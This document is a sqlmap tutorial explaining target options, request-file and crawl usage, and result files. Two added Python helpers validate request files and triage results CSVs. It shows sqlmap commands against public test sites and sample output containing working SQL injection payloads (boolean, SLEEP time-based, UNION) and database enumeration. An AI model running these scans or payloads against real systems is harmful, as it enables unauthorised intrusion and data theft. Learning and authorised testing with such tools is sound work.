http://sqlmap.org
sqlmap是一个開源的渗透測試工具,可透過sql injection的手法做自動化檢測,檢測範圍包括取得資料庫數據和相關權限,瀏覽作業系統文件與執行作業系統命令等
常見參數介紹
https://www.tr0y.wang/2018/03/21/sqlmap-guide
https://xz.aliyun.com/t/3010
Target selection
Specifying a target to test
Parameters
-u or --url: specify the URL to test
-p: specify the parameter(s) to test; if omitted, every parameter is tested
GET
Test all GET parameters
sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1
Test only parameters a and b
sqlmap -u "http://example.com/?a=1&b=2&c=3" -p "a,b"
POST
Parameter: --data
Test with POST data
sqlmap -u "http://example.com" --data "a=1&b=2&c=3" --method POST
Test with a POST JSON body
sqlmap -u "http://example.com" --data "{\"a\":\"abc\",\"b\":2}" --method POST
Parameter --forms: automatically detect the form fields that can be used for POST
sqlmap -u http://testphp.vulnweb.com/artists.php --forms
WebSocket
sqlmap -u ws://websocket.aaa.com:9091 --data '{"id": "1234"}'
Reference
https://0xdf.gitlab.io/2023/06/10/htb-soccer.html#sql-injection-over-websockets
Reading a request file
Parameter: -r
Example: sqlmap -r request.txt
Description: using sqlmap together with Burp Suite for POST injection
1. Open the target in the browser; Burp intercepts the corresponding request
2. Copy that request and save it as request.txt; the content looks roughly like this (note the blank line separating the headers from the body)
POST /test.php HTTP/1.1
Host: testphp.vulnweb.com
User-Agent: Mozilla/4.0

uname=1
3. Run sqlmap with the following command: sqlmap -r request.txt
Reference
https://blog.csdn.net/kuxing100/article/details/8731973
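A request file that is missing the blank line between headers and body, or that carries a Content-Length that no longer matches the body, is the most common reason a `-r` run tests nothing. The following added example (not part of the original notes and not sqlmap's own parser) parses a raw request file into its parts and reports those mistakes before the file is handed to sqlmap. The helper names `parse_request_file` and `check_request` and the sample request are constructed here for illustration.

```python
"""Parse and sanity-check a raw HTTP request file of the kind passed to `sqlmap -r`.

Added example, not part of the original notes or of sqlmap itself. The helper
names (parse_request_file, check_request) and the sample request are
constructed here for illustration; sqlmap's own request parser is not involved.
"""
import re

# Constructed sample: a Burp-style capture of the POST request shown in the
# notes, with the blank line that must separate the headers from the body.
SAMPLE_REQUEST = (
    "POST /test.php HTTP/1.1\r\n"
    "Host: testphp.vulnweb.com\r\n"
    "User-Agent: Mozilla/4.0\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 7\r\n"
    "\r\n"
    "uname=1"
)

REQUEST_LINE = re.compile(r"^([A-Z]+) (\S+) HTTP/(\d\.\d)$")


def parse_request_file(text):
    """Split a raw request into (method, path, headers, body).

    Accepts CRLF or LF line endings, because editors often rewrite them when a
    request is pasted into a file. Header names are lower-cased. The body is
    None when the file has no blank separator line at all.
    Raises ValueError if the first line is not an HTTP request line.
    """
    text = text.replace("\r\n", "\n")
    head, sep, body = text.partition("\n\n")
    lines = head.split("\n")
    m = REQUEST_LINE.match(lines[0])
    if not m:
        raise ValueError("first line is not an HTTP request line: %r" % lines[0])
    headers = {}
    for line in lines[1:]:
        if not line:
            continue
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return m.group(1), m.group(2), headers, (body if sep else None)


def check_request(text):
    """Return a list of problems that would make the file unusable or misleading for `-r`."""
    try:
        method, _path, headers, body = parse_request_file(text)
    except ValueError as exc:
        return [str(exc)]
    problems = []
    if "host" not in headers:
        problems.append("missing Host header (sqlmap needs it to build the target URL)")
    if method == "POST":
        if body is None:
            problems.append("no blank line after the headers, so the POST body is not separated")
        elif "content-length" in headers and int(headers["content-length"]) != len(body.encode()):
            problems.append("Content-Length %s does not match body length %d"
                            % (headers["content-length"], len(body.encode())))
        elif not body:
            problems.append("POST request has an empty body: nothing to test")
    return problems


if __name__ == "__main__":
    print(parse_request_file(SAMPLE_REQUEST))
    print(check_request(SAMPLE_REQUEST) or "request file looks usable")
```

Run it on the file you are about to pass to `-r`; an empty problem list means the method, Host and body will be read the way you expect.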
Reading request files in batch
Parameter: -l
Specify a Burp or WebScarab proxy log file; sqlmap parses the possible targets out of the log and tries injection against each of them in turn. The parameter is followed by the path of the log file.
Reading an XML file
sqlmap can parse an XML sitemap directly and extract targets from it
Parameter: -x
sqlmap -x http://example.com/sitemap.xml
Reading a URL list
Multiple URLs can be stored in a text file, one per line
Parameter: -m
sqlmap -m url.txt
url.txt looks roughly like this
example1.com/vuln1.php?q=foobar
example2.com/vuln2.asp?id=1
example3.com/vuln3/id/1*123
example.com/login.php POST username=admin&password=1234
example.com/upload.php POST file=example.png&submit=true
Testing forms
Test whether form data has an injection point
Parameter: --forms
When --forms is used together with -u, sqlmap parses the forms in the page returned by the URL given with -u and tests those forms for injection points; it does not test the target URL itself.
Using crawl
Starting from the target URL, crawl the target site and collect URLs that may be vulnerable. This parameter also requires a crawl depth, which is relative to the starting target URL. The crawl finishes only once every newly found link has been visited recursively. It is recommended to combine this parameter with --delay.
Parameter: --crawl
sqlmap -u example.com --batch --crawl=3
The output looks roughly like this
[02:20:53] [INFO] starting crawler
[02:20:53] [INFO] searching for links with depth 1
[02:20:53] [WARNING] running in a single-thread mode. This could take a while
[02:20:53] [INFO] searching for links with depth 2
[02:20:54] [INFO] heuristics detected web page charset 'ascii'
[02:21:00] [INFO] 42/56 links visited (75%)
Detection results
After sqlmap finishes, the results are displayed on screen and also saved to the output directory, e.g. /home/kali/.local/share/sqlmap/output/. The common files are the following
/home/kali/.local/share/sqlmap/output/results-*.csv
Provides summary data; content as follows
Target URL,Place,Parameter,Technique(s),Note(s)
http://testphp.vulnweb.com/artists.php?artist=1,GET,artist,BTU,
/home/kali/.local/share/sqlmap/output/<domain>/target.txt
http://testphp.vulnweb.com/artists.php?artist=1 (GET) # /usr/bin/sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 --batch
/home/kali/.local/share/sqlmap/output/<domain>/log
Records the detailed results
sqlmap identified the following injection point(s) with a total of 56 HTTP(s) requests:
---
Parameter: artist (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: artist=1 AND 4469=4469
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: artist=1 AND (SELECT 6311 FROM (SELECT(SLEEP(5)))DZNH)
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: artist=-3553 UNION ALL SELECT NULL,NULL,CONCAT(0x716b6a7671,0x56637273417949465365676d687042564b706c516e4e7443576c77616d5350714c4f4c6377637276,0x716a786271)-- -
---
web server operating system: Linux Ubuntu
web application technology: PHP 5.6.40, Nginx 1.19.0
back-end DBMS: MySQL >= 5.0.12
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: artist (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: artist=1 AND 4469=4469
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: artist=1 AND (SELECT 6311 FROM (SELECT(SLEEP(5)))DZNH)
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: artist=-3553 UNION ALL SELECT NULL,NULL,CONCAT(0x716b6a7671,0x56637273417949465365676d687042564b706c516e4e7443576c77616d5350714c4f4c6377637276,0x716a786271)-- -
---
web server operating system: Linux Ubuntu
web application technology: PHP 5.6.40, Nginx 1.19.0
back-end DBMS: MySQL >= 5.0.12
available databases [2]:
[*] acuart
[*] information_schema
...omit...
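The results-*.csv file is the quickest place to see what a run found, but its Technique(s) column is a string of letters (BTU above) that has to be expanded before it is useful to whoever has to fix the application. The following added example (not part of the original notes and not sqlmap's own code) parses that CSV layout, expands the technique letters using the codes sqlmap uses for its --technique option, groups findings per host, and ranks the one that allows the most direct data extraction first. The sample rows beyond the one shown above and the helper names are constructed here for illustration.

```python
"""Summarise sqlmap's results-*.csv files into a per-host triage list.

Added example, not part of the original notes or of sqlmap. The CSV layout
(Target URL,Place,Parameter,Technique(s),Note(s)) is the one shown in the notes;
the extra sample rows and the helper names are constructed here for illustration.
"""
import csv
import io
from urllib.parse import urlsplit

# Letters used in the Technique(s) column, as in sqlmap's --technique option.
TECHNIQUES = {
    "B": "boolean-based blind",
    "E": "error-based",
    "U": "UNION query",
    "S": "stacked queries",
    "T": "time-based blind",
    "Q": "inline query",
}

# Constructed sample: the row from the notes plus two rows for a second host.
SAMPLE_CSV = """Target URL,Place,Parameter,Technique(s),Note(s)
http://testphp.vulnweb.com/artists.php?artist=1,GET,artist,BTU,
http://example.com/login.php,POST,username,T,
http://example.com/login.php,POST,password,BE,
"""

# Techniques that return data inline come first: they give an attacker the
# fastest exfiltration path, so those parameters should be fixed first.
SEVERITY_ORDER = ["UNION query", "error-based", "stacked queries", "inline query",
                  "boolean-based blind", "time-based blind"]


def parse_results(text):
    """Return one dict per CSV row, with the technique letters expanded to names."""
    findings = []
    for row in csv.DictReader(io.StringIO(text)):
        letters = row["Technique(s)"].strip()
        findings.append({
            "url": row["Target URL"],
            "place": row["Place"],
            "parameter": row["Parameter"],
            "techniques": [TECHNIQUES.get(c, "unknown (%s)" % c) for c in letters],
            "notes": row["Note(s)"],
        })
    return findings


def group_by_host(findings):
    """Map host -> list of (place, parameter, technique names) for a per-application fix list."""
    by_host = {}
    for f in findings:
        host = urlsplit(f["url"]).hostname
        by_host.setdefault(host, []).append((f["place"], f["parameter"], f["techniques"]))
    return by_host


def worst_finding(findings):
    """Return the finding whose best technique sits earliest in SEVERITY_ORDER."""
    def rank(f):
        return min((SEVERITY_ORDER.index(t) for t in f["techniques"] if t in SEVERITY_ORDER),
                   default=len(SEVERITY_ORDER))
    return min(findings, key=rank)


if __name__ == "__main__":
    found = parse_results(SAMPLE_CSV)
    for host, items in group_by_host(found).items():
        print(host)
        for place, param, techs in items:
            print("  %s %s: %s" % (place, param, ", ".join(techs)))
    w = worst_finding(found)
    print("fix first:", w["url"], w["parameter"], w["techniques"])
```

Point `parse_results` at the contents of a real results-*.csv to get the same per-host list for an actual run; the Note(s) column is carried through unchanged.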
Vulnerable websites for online testing
Provided by HP WebInspect
- http://zero.webappsecurity.com/index.html
Provided by IBM
- http://demo.testfire.net/
Provided by Acunetix
- http://testasp.vulnweb.com/
- http://testphp.vulnweb.com/
- http://testhtml5.vulnweb.com/
- http://testaspnet.vulnweb.com/
Provided by OWASP
- https://juice-shop.herokuapp.com
Reference
https://ithelp.ithome.com.tw/articles/10202811
https://xdeath.tw/read.php?69
https://dotblogs.com.tw/a926/2016/01/07/094825
https://www.freebuf.com/sectool/164608.html